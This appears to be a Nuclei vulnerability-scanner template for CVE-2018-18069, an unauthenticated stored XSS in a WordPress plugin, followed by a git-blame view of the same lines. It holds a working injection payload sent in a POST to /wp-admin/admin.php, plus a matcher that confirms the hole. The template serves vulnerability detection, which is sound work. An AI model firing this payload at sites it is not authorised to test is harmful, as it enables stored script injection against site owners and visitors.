nuclei-templates/cves/CVE-2018-18069.yaml

id: CVE-2018-18069

info:
  name: Wordpress unauthenticated stored xss
  author: nadino
  severity: medium

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php"
    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'

    matchers:
      - type: dsl
        dsl:
          - 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00			`id: CVE-2018-18069`

			`info:`
			`name: Wordpress unauthenticated stored xss`
			`author: nadino`
improve wp cve admin 2020-05-23 08:09:09 +00:00			`severity: medium`
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00
			`requests:`
			`- method: POST`
improve wp cve admin 2020-05-23 08:09:09 +00:00			`path:`
adding 2 cves and crxde 2020-05-14 17:54:02 +00:00			`- "{{BaseURL}}/wp-admin/admin.php"`
improve wp cve admin 2020-05-23 08:09:09 +00:00			`body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'`

adding 2 cves and crxde 2020-05-14 17:54:02 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
Update syntax 2020-05-25 07:49:06 +00:00			`- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'`